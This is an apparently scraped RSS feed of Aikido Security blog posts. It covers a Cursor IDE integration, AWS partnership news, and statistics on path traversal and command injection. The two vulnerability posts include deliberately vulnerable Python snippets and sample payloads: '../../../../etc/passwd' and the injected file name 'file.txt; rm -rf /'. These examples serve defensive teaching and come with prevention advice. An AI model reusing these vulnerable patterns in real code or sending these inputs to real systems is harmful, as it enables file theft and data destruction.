&lt;p&gt;While respondents are likely mostly early adopters, it is still pretty impressive to see Cursor as a new entrant capturing hearts &amp;amp; minds so quickly. It’s no surprise they’ve since raised $60m in Series A funding from Andreessen Horowitz, Thrive Capital, OpenAI, Jeff Dean, Noam Brown, and the founders of Stripe, GitHub, Ramp, Perplexity, and OpenAI, among others.&lt;/p&gt;

&lt;p&gt;That’s why Aikido Security is excited to launch our new integration with Cursor AI. Aikido x Cursor brings real-time security into the Cursor IDE, helping developers write and generate secure code from the start—without breaking stride.&lt;/p&gt;

&lt;h2&gt;
  
  
  &lt;strong&gt;Secure your code as it's&lt;/strong&gt; &lt;del&gt;&lt;strong&gt;written&lt;/strong&gt;&lt;/del&gt; &lt;strong&gt;generated.&lt;/strong&gt;
&lt;/h2&gt;

&lt;h3&gt;
  
  
  How the Integration Works
&lt;/h3&gt;

&lt;p&gt;Today you can integrate Aikido directly into your Cursor IDE. Aikido will scan your codebase for &lt;strong&gt;secrets, API keys&lt;/strong&gt; and &lt;strong&gt;SAST&lt;/strong&gt; code issues as you develop, whenever you open or save a file.&lt;/p&gt;

&lt;p&gt;If any issues are detected, Aikido highlights them in the editor and displays issues in the Problems panel. When you hover over a detected SAST issue, additional tl;dr context about the problem is provided. In some instances, you can even fix issues with Cursor’s suggestions in chat (though its still rusty).&lt;/p&gt;

&lt;ol&gt;
&lt;li&gt;
&lt;strong&gt;Detect Vulnerabilities Instantly&lt;/strong&gt; Aikido scans code as it’s generated, identifying security vulnerabilities in real time. Clear, concise explanations ensure you know what the issue is and why it matters—no overcomplicated reports.&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Fix Issues with One Click&lt;/strong&gt; When a vulnerability is flagged, Cursor x Aikido can generate fix suggestions in one click. You can apply it directly from within Cursor’s interface, keeping your workflow uninterrupted.&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Stay Focused&lt;/strong&gt; Everything happens within the Cursor IDE. There’s no need to switch tools, run external scans, or juggle separate platforms. Aikido integrates seamlessly into the IDE, so you can focus on building while knowing your code is secure.&lt;/li&gt;
&lt;/ol&gt;

&lt;h3&gt;
  
  
  Why It Matters
&lt;/h3&gt;

&lt;p&gt;There’s no doubting the impact Gen AI will have on engineering. AI code generators or co-pilots are not infallible. On one hand, gen AI can be used to increase security (more on this very soon!). On the other hand, they will also inevitably introduce vulnerabilities as well. We are all waiting for the day that AI can finish the nitty gritty. Today we are a step closer. &lt;/p&gt;

&lt;p&gt;This integration allows developers to stay in the fast lane and build secure applications while leveraging the best of AI-driven tools while being assured the output is secure. Get security done. Get back to building.&lt;/p&gt;

&lt;h3&gt;
  
  
  Get Started
&lt;/h3&gt;

&lt;p&gt;The Aikido integration is available now for Cursor users. Follow the steps below:  &lt;strong&gt;Step 1.&lt;/strong&gt; Head over to the &lt;a href="https://marketplace.visualstudio.com/items?itemName=AikidoSecurity.aikido" rel="noopener noreferrer"&gt;Visual Studio Code Marketplace&lt;/a&gt; and follow the instructions on &lt;a href="https://www.cursor.com/how-to-install-extension" rel="noopener noreferrer"&gt;how to install an extension in Cursor.&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Step 2.&lt;/strong&gt; In Aikido, go to the &lt;a href="https://app.aikido.dev/settings/integrations/ide/cursor" rel="noopener noreferrer"&gt;Cursor IDE integration page&lt;/a&gt; and create your token.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Step 3.&lt;/strong&gt; Check out the examples in our docs on the &lt;a href="https://marketplace.visualstudio.com/items?itemName=AikidoSecurity.aikido" rel="noopener noreferrer"&gt;Visual Studio Marketplace to test &lt;/a&gt;whether everything works well.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Step 4&lt;/strong&gt;. Get back to building.&lt;/p&gt;

</description>
      <category>sast</category>
      <category>tools</category>
    </item>
    <item>
      <title>Aikido joins the AWS Partner Network</title>
      <dc:creator>Felix Garriau</dc:creator>
      <pubDate>Tue, 26 Nov 2024 13:40:37 +0000</pubDate>
      <link>https://forem.com/aikidosecurity/aikido-joins-the-aws-partner-network-1ej4</link>
      <guid>https://forem.com/aikidosecurity/aikido-joins-the-aws-partner-network-1ej4</guid>
      <description>&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fd37oebn0w9ir6a.cloudfront.net%2Faccount_39169%2Faws-visual_bc09724747eaca378e4a741c921c398c.jpg" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fd37oebn0w9ir6a.cloudfront.net%2Faccount_39169%2Faws-visual_bc09724747eaca378e4a741c921c398c.jpg" width="800" height="512"&gt;&lt;/a&gt;Learn more about it &lt;a href="https://www.aikido.dev/aws" rel="noopener noreferrer"&gt;here&lt;/a&gt;.&lt;/p&gt;

&lt;p&gt;If you missed it, over the summer months launched our product on the AWS Marketplace with the promise to deliver the fastest “time-to-security” in the industry for new AWS users.&lt;/p&gt;

&lt;p&gt;We’ve also officially joined the AWS Partner Network (APN) as a validated AWS partner.&lt;/p&gt;

&lt;p&gt;This means we went through the AWS Foundational Technical Review (FTR). We are &lt;strong&gt;FTR-approved*&lt;/strong&gt; and meet the well-architected best practices enforced by AWS, not to brag. ;)&lt;/p&gt;

&lt;p&gt;&lt;em&gt;Psst. You’ll soon be able to&lt;/em&gt; &lt;em&gt;&lt;strong&gt;use Aikido to achieve FTR approval&lt;/strong&gt;&lt;/em&gt;&lt;em&gt;. We’re mapping Aikido functionality to the FTR security process, so you can get up, running, and co-selling with AWS fast. Interested? → sign up here and you’ll be the first to know when.&lt;/em&gt;&lt;/p&gt;

&lt;p&gt;Beyond the snazzy partner badge, we’re excited to be an official AWS partner to unlock greater access to the AWS community. We can better serve cloud-native customers, cut-out unnecessary complexity in the customer journey, and &lt;a href="https://www.aikido.dev/scanners/cloud-posture-management-cspm" rel="noopener noreferrer"&gt;expand our own Cloud Security Posture Management (CSPM) product for AWS Cloud users&lt;/a&gt;.&lt;/p&gt;

&lt;h2&gt;
  
  
  Why add Aikido to your AWS bill?
&lt;/h2&gt;

&lt;p&gt;Aikido Security provides comprehensive &lt;strong&gt;code-to-cloud coverage&lt;/strong&gt;, aligning well with AWS’s full-stack capabilities. This is especially valuable for AWS customers managing both application and cloud security on a unified platform.&lt;/p&gt;

&lt;p&gt;The direct integration with AWS environments simplifies deployment, enabling Aikido to scan for vulnerabilities across AWS services like EC2, S3, Lambda, and more – enhancing security visibility within AWS and complementing cloud-native architecture. Aikido's AWS posture management is built on AWS Inspector. We can show you findings that can cause hackers to gain initial access to your cloud.&lt;/p&gt;

&lt;p&gt;Further, Aikido’s &lt;a href="https://www.aikido.dev/use-cases/soc2-iso-compliance" rel="noopener noreferrer"&gt;built-in compliance checks&lt;/a&gt; align with major standards (SOC2, ISO 27001, NIS 2, HIPAA), making it easier for AWS clients to maintain compliance across AWS’s infrastructure, which is especially valuable for regulated industries.&lt;/p&gt;

&lt;p&gt;Interested to check it out? Come find us &lt;a href="https://aws.amazon.com/marketplace/pp/prodview-cogk44gx2w4ge" rel="noopener noreferrer"&gt;on the AWS marketplace&lt;/a&gt;&lt;/p&gt;

</description>
      <category>aws</category>
    </item>
    <item>
      <title>Path Traversal in 2024 - The year unpacked</title>
      <dc:creator>Felix Garriau</dc:creator>
      <pubDate>Sun, 24 Nov 2024 17:10:35 +0000</pubDate>
      <link>https://forem.com/aikidosecurity/path-traversal-in-2024-the-year-unpacked-4jgo</link>
      <guid>https://forem.com/aikidosecurity/path-traversal-in-2024-the-year-unpacked-4jgo</guid>
      <description>&lt;p&gt;Path traversal, also known as directory traversal, occurs when a malicious user manipulates user-supplied data to gain unauthorized access to files and directories. Typically the attacker will be trying to access logs and credentials that are in different directories. Path traversal is not a new vulnerability and has been actively exploited since the 90s when web servers gained popularity, many relied on Common Gateway Interface (CGI) scripts to execute dynamic server-side content. &lt;/p&gt;

&lt;p&gt;&lt;strong&gt;With such a long history, is path traversal still popular today?&lt;/strong&gt; We conducted a study of both open-source and closed-source projects to gather data to see how common path traversal was in 2024 and if we are improving, &lt;em&gt;Spoilers we aren&lt;/em&gt;’t. &lt;/p&gt;

&lt;h3&gt;
  
  
  Path traversal example
&lt;/h3&gt;

&lt;p&gt;So how exactly does path traversal work? Let's look at a simple example. &lt;/p&gt;

&lt;p&gt;In this simple application, a user is given a file to download via a variable in the URL. &lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fd37oebn0w9ir6a.cloudfront.net%2Faccount_39169%2F1_52fcd035c02f00167f0315977edec501.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fd37oebn0w9ir6a.cloudfront.net%2Faccount_39169%2F1_52fcd035c02f00167f0315977edec501.png" width="800" height="133"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;There is some simple backend Python code handling the request.&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;import os  

def download_file(file):     
    base_directory = "/var/www/files"     
    file_path = os.path.join(base_directory, file)          

    if os.path.exists(file_path):         
        with open(file_path, 'rb') as f:             
             return f.read()    
    else:         
       return "File not found"
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;​&lt;/p&gt;

&lt;p&gt;Now as the variable is supplied in the URL we can change it to something like this &lt;code&gt;file=../../../../etc/passwd&lt;/code&gt;&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fd37oebn0w9ir6a.cloudfront.net%2Faccount_39169%2F2_4c4da80b04c3fdbdf481f26063051f01.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fd37oebn0w9ir6a.cloudfront.net%2Faccount_39169%2F2_4c4da80b04c3fdbdf481f26063051f01.png" width="800" height="133"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;Here the attacker is using the ../../ to traverse up the directory structure to the system root level and access the passed file potentially gaining access to sensitive information.&lt;/p&gt;

&lt;p&gt;If you want to see how this method could be secured scroll down to bonus content.&lt;/p&gt;

&lt;blockquote&gt;
&lt;p&gt;&lt;em&gt;In more complex scenarios involving multiple layers of directories or encoded characters (e.g.,&lt;/em&gt; &lt;code&gt;%2e%2e%2f&lt;/code&gt;&lt;em&gt;), attackers can bypass basic filters and gain deeper access into the file system.&lt;/em&gt;&lt;/p&gt;
&lt;/blockquote&gt;

&lt;h2&gt;
  
  
  Path traversal by the numbers
&lt;/h2&gt;

&lt;ul&gt;
&lt;li&gt;
&lt;strong&gt;2.7% of all vulnerabilities found in open-source&lt;/strong&gt; projects in 2024 so far were path traversal&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;3.5% for closed-source&lt;/strong&gt; projects!&lt;/li&gt;
&lt;li&gt;An increase in the total number of path traversal vulnerabilities in open-source projects &lt;strong&gt;from 742&lt;/strong&gt; &lt;em&gt;&lt;strong&gt;(2023)&lt;/strong&gt;&lt;/em&gt; &lt;strong&gt;to an expected 1,000&lt;/strong&gt; &lt;em&gt;&lt;strong&gt;(2024)&lt;/strong&gt;&lt;/em&gt;&lt;em&gt;.&lt;/em&gt;
&lt;/li&gt;
&lt;li&gt;As a percentage of all vulnerabilities, path traversal is getting more common with a &lt;strong&gt;massive increase in closed-source projects of 85%&lt;/strong&gt;
&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fd37oebn0w9ir6a.cloudfront.net%2Faccount_39169%2Fpath-traversal_e409b2a17d3e9c9e059aa5b682f29124.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fd37oebn0w9ir6a.cloudfront.net%2Faccount_39169%2Fpath-traversal_e409b2a17d3e9c9e059aa5b682f29124.png" width="800" height="450"&gt;&lt;/a&gt;&lt;strong&gt;Path Traversal in 2024 and 2023&lt;/strong&gt; &lt;/p&gt;

&lt;p&gt;Our research focused on researching both open-source and closed-source projects to reveal how many had path traversal vulnerabilities hiding within.&lt;/p&gt;

&lt;p&gt;Overall the number of path traversal vulnerabilities is lower than some others we have researched such as Command Injections, or SQL Injections. But considering that this vulnerability can be very dangerous and has well-documented solutions to prevent it, it is alarming to see the numbers as high as they are. It is even more alarming to see the trends for this vulnerability going in the wrong direction. f&lt;/p&gt;

&lt;h2&gt;
  
  
  &lt;strong&gt;Open Source Projects&lt;/strong&gt;
&lt;/h2&gt;

&lt;p&gt;In open-source projects, path traversal accounted for 2.6% of all reported vulnerabilities in 2023. This figure saw a slight increase in 2024, rising to 2.75%. While this increment may seem marginal at first glance, it underscores ongoing challenges in securing open-source software against even simple vulnerabilities. &lt;/p&gt;

&lt;h3&gt;
  
  
  Closed Source Projects
&lt;/h3&gt;

&lt;p&gt;The most notable trend was observed in closed-source projects where path traversal incidents surged from 1.9% in 2023 to 3.5% in 2024—a substantial increase of 85% highlighting an alarming trend of this kind of vulnerability.&lt;/p&gt;

&lt;p&gt;The bad news unfortunately doesn’t stop there. We are still seeing an increase in the overall number of vulnerabilities reported in open-source projects. The total number of injection vulnerabilities reported in open-source projects went from 742 in 2023 to 917 so far in 2024 (expected to reach 1,000)&lt;/p&gt;

&lt;h2&gt;
  
  
  ​
&lt;/h2&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fd37oebn0w9ir6a.cloudfront.net%2Faccount_39169%2Ftotal-number-path-traversal_6ab1090a51de6f324b95fc40903d5aee.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fd37oebn0w9ir6a.cloudfront.net%2Faccount_39169%2Ftotal-number-path-traversal_6ab1090a51de6f324b95fc40903d5aee.png" width="800" height="450"&gt;&lt;/a&gt;Number of path traversal vulnerabilities in 2024 and 2023&lt;/p&gt;

&lt;h2&gt;
  
  
  Preventing Path Traversal
&lt;/h2&gt;

&lt;p&gt;Preventing command injection vulnerabilities requires a multi-faceted approach:&lt;/p&gt;

&lt;h4&gt;
  
  
  &lt;strong&gt;Input Validation&lt;/strong&gt;
&lt;/h4&gt;

&lt;ul&gt;
&lt;li&gt;
&lt;strong&gt;Sanitize user inputs&lt;/strong&gt;: Strip out or encode dangerous characters such as &lt;code&gt;../&lt;/code&gt;, &lt;code&gt;..\&lt;/code&gt;, &lt;code&gt;..%2f&lt;/code&gt;, or other variations.&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Allowlist approach&lt;/strong&gt;: Define a strict set of permissible inputs (e.g., file names or paths) and reject anything outside this list.&lt;/li&gt;
&lt;/ul&gt;

&lt;h4&gt;
  
  
  &lt;strong&gt;Restrict File Access&lt;/strong&gt;
&lt;/h4&gt;

&lt;ul&gt;
&lt;li&gt;
&lt;strong&gt;Use a chroot jail or sandbox&lt;/strong&gt;: Limit the application’s file access to a restricted directory, ensuring it cannot traverse beyond the intended directory tree.&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Set root directories&lt;/strong&gt;: Define base directories and ensure all paths are relative to them. Use APIs or frameworks that enforce this, such as:&lt;code&gt;java.nio.file.Paths.get("baseDir").resolve(userInput).normalize()&lt;/code&gt; in Java. &lt;code&gt;os.path.realpath()&lt;/code&gt; and &lt;code&gt;os.path.commonpath()&lt;/code&gt; in Python.&lt;/li&gt;
&lt;/ul&gt;

&lt;h4&gt;
  
  
  &lt;strong&gt;Secure File Access APIs&lt;/strong&gt;
&lt;/h4&gt;

&lt;ul&gt;
&lt;li&gt;Use secure file access methods provided by modern libraries or frameworks:In &lt;strong&gt;Java&lt;/strong&gt;, use &lt;code&gt;Files.newInputStream()&lt;/code&gt; or &lt;code&gt;Files.newBufferedReader()&lt;/code&gt; for safe file handling.
In &lt;strong&gt;Python&lt;/strong&gt;, ensure you validate file paths before accessing them.&lt;/li&gt;
&lt;/ul&gt;

&lt;h4&gt;
  
  
  &lt;strong&gt;Use Environment Restrictions&lt;/strong&gt;
&lt;/h4&gt;

&lt;ul&gt;
&lt;li&gt;Set restrictive &lt;strong&gt;file system permissions&lt;/strong&gt;:Ensure the application has only the minimum required privileges.
Deny access to sensitive directories (e.g., &lt;code&gt;/etc&lt;/code&gt;, &lt;code&gt;/var&lt;/code&gt;, &lt;code&gt;/usr&lt;/code&gt;, and user home directories).&lt;/li&gt;
&lt;li&gt;Disable unnecessary features in web servers or frameworks (e.g., symbolic link following).&lt;/li&gt;
&lt;/ul&gt;

&lt;h4&gt;
  
  
  &lt;strong&gt;Automated Testing&lt;/strong&gt;
&lt;/h4&gt;

&lt;ul&gt;
&lt;li&gt;Use tools like Aikido to scan your source code and application to discover these vulnerabilities.&lt;/li&gt;
&lt;li&gt;Both SAST and DAST tools should be used together along with domain scanning and cloud security to ensure you have no hidden path traversal vulnerabilities.&lt;/li&gt;
&lt;/ul&gt;

&lt;h4&gt;
  
  
  &lt;strong&gt;Use an in-app firewall&lt;/strong&gt;
&lt;/h4&gt;

&lt;ul&gt;
&lt;li&gt;One of the best defenses against injection attacks is an &lt;a href="https://www.aikido.dev/zen" rel="noopener noreferrer"&gt;in-app firewall &lt;/a&gt;that is able to catch and block malicious commands.&lt;/li&gt;
&lt;/ul&gt;

&lt;h2&gt;
  
  
  The road forward
&lt;/h2&gt;

&lt;p&gt;Path traversal is a vulnerability that has been present since the beginning of web apps and while it is often quite simple, it can also be a very devastating exploit. This makes it so concerning that such a large percentage of projects are still struggling with such issues. While 3.5% does not seem like a high number, it is quite remarkable that the number is growing in popularity despite its clear continued and well-documented threat. &lt;/p&gt;

&lt;p&gt;Path traversal isn’t a vulnerability that is going away but the good news is that there are clear ways we can find these vulnerabilities in our application and remediate any issues we find. &lt;/p&gt;

&lt;p&gt;​&lt;/p&gt;

&lt;h2&gt;
  
  
  Bonus Content
&lt;/h2&gt;

&lt;h3&gt;
  
  
  Real-World Incidents
&lt;/h3&gt;

&lt;p&gt;There have been several high-profile breaches or vulnerabilities in recent years that involved path traversal as either the primary point of entry or as part of a chain of vulnerability&lt;/p&gt;

&lt;h4&gt;
  
  
  &lt;a href="https://www.giac.org/paper/gcih/115/iis-unicode-exploit/101163" rel="noopener noreferrer"&gt;Microsoft IIS Unicode Exploit&lt;/a&gt; &lt;strong&gt;(2001)&lt;/strong&gt;
&lt;/h4&gt;

&lt;p&gt;One of the earliest high-profile path traversal exploits targeting Microsoft IIS servers. Attackers used encoded paths to bypass validation mechanisms (e.g., using &lt;code&gt;%c0%af&lt;/code&gt; to represent &lt;code&gt;/&lt;/code&gt;). This allowed them to access and execute files outside the web root directory.&lt;/p&gt;

&lt;p&gt;This enabled the deployment of malware and defacement of numerous websites.&lt;/p&gt;

&lt;h4&gt;
  
  
  &lt;a href="https://www.fortinet.com/blog/psirt-blogs/fortios-ssl-vulnerability" rel="noopener noreferrer"&gt;Fortinet VPN Path Traversal&lt;/a&gt; &lt;strong&gt;(2019)&lt;/strong&gt;
&lt;/h4&gt;

&lt;p&gt;Fortinet's SSL VPN was found to have a directory traversal vulnerability (CVE-2018-13379). Attackers exploited this flaw to access sensitive system files, such as plaintext passwords for VPN users.&lt;/p&gt;

&lt;p&gt;Thousands of VPN credentials were leaked online, exposing organizations to unauthorized access and further attacks.&lt;/p&gt;

&lt;h4&gt;
  
  
  &lt;a href="https://www.capitalone.com/digital/facts2019/" rel="noopener noreferrer"&gt;Capital One Breach&lt;/a&gt; &lt;strong&gt;(2019)&lt;/strong&gt;
&lt;/h4&gt;

&lt;p&gt;&lt;strong&gt;What happened&lt;/strong&gt;: While the primary cause was an SSRF vulnerability, the attacker also leveraged directory traversal in accessing AWS S3 bucket metadata. The attacker exploited misconfigurations to retrieve configuration files that should have been inaccessible.&lt;/p&gt;

&lt;p&gt;This exposed personal data of 106 million credit card applicants.&lt;/p&gt;

&lt;h4&gt;
  
  
  &lt;a href="https://nvd.nist.gov/vuln/detail/CVE-2020-8570" rel="noopener noreferrer"&gt;Path Traversal in Kubernetes Dashboard&lt;/a&gt; &lt;strong&gt;(2020)&lt;/strong&gt;
&lt;/h4&gt;

&lt;p&gt;The Kubernetes Dashboard had a directory traversal flaw (CVE-2020-8563). Attackers exploited this to read sensitive files in the container, including secrets stored in &lt;code&gt;/etc&lt;/code&gt;.&lt;/p&gt;

&lt;p&gt;​&lt;/p&gt;

&lt;h3&gt;
  
  
  ​
&lt;/h3&gt;

</description>
      <category>sast</category>
    </item>
    <item>
      <title>Command injection in 2024 unpacked</title>
      <dc:creator>Felix Garriau</dc:creator>
      <pubDate>Fri, 22 Nov 2024 20:12:50 +0000</pubDate>
      <link>https://forem.com/aikidosecurity/command-injection-in-2024-unpacked-56k9</link>
      <guid>https://forem.com/aikidosecurity/command-injection-in-2024-unpacked-56k9</guid>
      <description>&lt;h2&gt;
  
  
  &lt;strong&gt;What is Command Injection?&lt;/strong&gt;
&lt;/h2&gt;

&lt;p&gt;Command injection is a vulnerability still very prevalent in web applications despite being less famous than its cousins SQL injection or Code injection. If you’re familiar with other injection vulnerabilities, you’ll recognize the common principle: untrusted user input is not properly validated, leading to the execution of arbitrary system commands. This flaw occurs when unvalidated input is passed to system-level functions. &lt;strong&gt;So how prominent is command injection actually?&lt;/strong&gt; We looked at how common it is to see this vulnerability in the wild, *spoiler*, it is surprisingly common! &lt;/p&gt;

&lt;h3&gt;
  
  
  &lt;strong&gt;Example of Command Injection&lt;/strong&gt;
&lt;/h3&gt;

&lt;p&gt;Consider this example of command injection,  let’s say you have an application where you can enter the name of a file hosted on a server. The application retrieves that file writing out its content. The code for which is below&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;import os

file_name = input("Enter the file name: ")
os.system(f"cat {file_name}")
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;The above code expects a user to insert a file name like &lt;code&gt;file.txt&lt;/code&gt; , but instead  a malicious user injects some code to run malicious commands. &lt;/p&gt;

&lt;p&gt;&lt;em&gt;For example&lt;/em&gt;  Name of file: &lt;code&gt;file.txt; rm -rf /&lt;/code&gt;&lt;/p&gt;

&lt;p&gt;This input would first display the contents of &lt;code&gt;file.txt&lt;/code&gt; and then execute the malicious &lt;code&gt;rm -rf&lt;/code&gt;command, which will forcibly delete all the files in a directory. &lt;/p&gt;

&lt;p&gt;The malicious user can do this because the application did not validate or sanitize the user's input making the application is susceptible to command injection. &lt;/p&gt;

&lt;p&gt;&lt;em&gt;If you would like a more comprehensive example see the bonus content at the&lt;/em&gt; bottom of this page.&lt;/p&gt;

&lt;h2&gt;
  
  
  Command Injection in Numbers: Our Research
&lt;/h2&gt;

&lt;ul&gt;
&lt;li&gt;
&lt;strong&gt;7% of all vulnerabilities found in open-source&lt;/strong&gt; projects in 2024 were command injection&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;5.8% for closed-source&lt;/strong&gt; projects!&lt;/li&gt;
&lt;li&gt;An increase in the total number of command injection vulnerabilities in open-source projects  &lt;strong&gt;from 2,348&lt;/strong&gt; &lt;em&gt;&lt;strong&gt;(2023)&lt;/strong&gt;&lt;/em&gt; &lt;strong&gt;to an expected 2,600&lt;/strong&gt; &lt;em&gt;&lt;strong&gt;(2024)&lt;/strong&gt;&lt;/em&gt;&lt;em&gt;.&lt;/em&gt;
&lt;/li&gt;
&lt;li&gt;As a percentage of all vulnerabilities, &lt;strong&gt;Command injection is getting less popular&lt;/strong&gt;: a &lt;strong&gt;decrease of 14.6% and 26.4%&lt;/strong&gt; for open-source and closed-source projects respectively from 2023 to 2024&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fd37oebn0w9ir6a.cloudfront.net%2Faccount_39169%2Fcommand-injection_3c5da5a38fcc1b2b7fdab3a64ad8594d.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fd37oebn0w9ir6a.cloudfront.net%2Faccount_39169%2Fcommand-injection_3c5da5a38fcc1b2b7fdab3a64ad8594d.png" width="800" height="450"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;Our research focused on researching both open-source and closed-source projects to reveal how many had command injection vulnerabilities hiding within.&lt;/p&gt;

&lt;p&gt;Overall the number of command injection vulnerabilities is very high with 7% of  allvulnerabilities reported in open-source projects being command injection and 5.8% in closed-source projects. &lt;a href="https://www.aikido.dev/blog/the-state-of-sql-injections" rel="noopener noreferrer"&gt;This is quite close to the number of SQL injection vulnerabilities found. &lt;/a&gt;&lt;/p&gt;

&lt;p&gt;There is some good news to pull out of the data too, we are seeing a solid trend of these vulnerabilities reducing from 2023 to 2024. As a percentage of all vuleribilities we saw a reduction of 27% in closed-source projects and 14% in open-source. There are likely many factors contributing to this, one likely significant factor is that the &lt;a href="https://www.cisa.gov/news-events/alerts/2024/07/10/cisa-and-fbi-release-secure-design-alert-eliminating-os-command-injection-vulnerabilities" rel="noopener noreferrer"&gt;FBI and CISA&lt;/a&gt; in 2024 pointed to command injection as a real threat and urged vendors to pay attention to it. According to the data, this warning was heard. &lt;/p&gt;

&lt;p&gt;The good news unfortunately stops there. We are still seeing an increase in the overall number of vulnerabilities reported in open-source projects. The total number of injection vulnerabilities reported in open-source projects went from 2,348 in 2023 to 2,450 so far in 2024 (expected to reach 2,600) &lt;/p&gt;

&lt;p&gt;​&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fd37oebn0w9ir6a.cloudfront.net%2Faccount_39169%2Ftotal-number-command-injection-1_edec6541ebc6a1b59e7e85a2d9503631.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fd37oebn0w9ir6a.cloudfront.net%2Faccount_39169%2Ftotal-number-command-injection-1_edec6541ebc6a1b59e7e85a2d9503631.png" width="800" height="450"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;h2&gt;
  
  
  How to Prevent Command Injection
&lt;/h2&gt;

&lt;p&gt;Preventing command injection vulnerabilities requires a multi-faceted approach:&lt;/p&gt;

&lt;h4&gt;
  
  
  &lt;strong&gt;Server-side Input Validation&lt;/strong&gt;
&lt;/h4&gt;

&lt;p&gt;A common mistake some make is performing only clientside validation which can be bypassed by an attacker making a direct request.&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;import subprocess
# Example of restricted input
allowed_files = ['file1.txt', 'file2.txt']
user_input = "file1.txt"  # This should come from user, but is validated
if user_input in allowed_files:
subprocess.Popen(['ls', '-l', user_input])
else:
print("Invalid input!")
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;h4&gt;
  
  
  &lt;strong&gt;Avoid shell commands&lt;/strong&gt;
&lt;/h4&gt;

&lt;p&gt;Replace shell commands with language-native functions or libraries where possible. Below is an example of using read only mode to open a file and read the contexts within.&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;with open("file.txt", "r") as f:
print(f.read())
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;h4&gt;
  
  
  &lt;strong&gt;Automated Testing&lt;/strong&gt;
&lt;/h4&gt;

&lt;p&gt;Use tools like Aikido to scan your source code and application to discover these vulnerabilities.&lt;/p&gt;

&lt;h4&gt;
  
  
  &lt;strong&gt;Use an in-app firewall&lt;/strong&gt;
&lt;/h4&gt;

&lt;p&gt;One of the best defenses against injection attacks is an &lt;a href="https://www.aikido.dev/zen" rel="noopener noreferrer"&gt;in-app firewall &lt;/a&gt;that is able to catch and block malicious commands.&lt;/p&gt;

&lt;h4&gt;
  
  
  &lt;strong&gt;Apply the Principle of Least Privilege&lt;/strong&gt;
&lt;/h4&gt;

&lt;p&gt;Configure applications and users to run with the minimum privileges necessary, reducing potential damage from exploitation.&lt;/p&gt;

&lt;h2&gt;
  
  
  &lt;strong&gt;The road forward&lt;/strong&gt;
&lt;/h2&gt;

&lt;p&gt;Command injection along with many injection vulnerabilities is a challenge, from a technology point of view, we have solved this, meaning there is no need to have this kind of vulnerability in your applications. With that in mind, the fact that we still see so many of these types of vulnerabilities means we can’t expect a quantum leap of improvement. &lt;/p&gt;

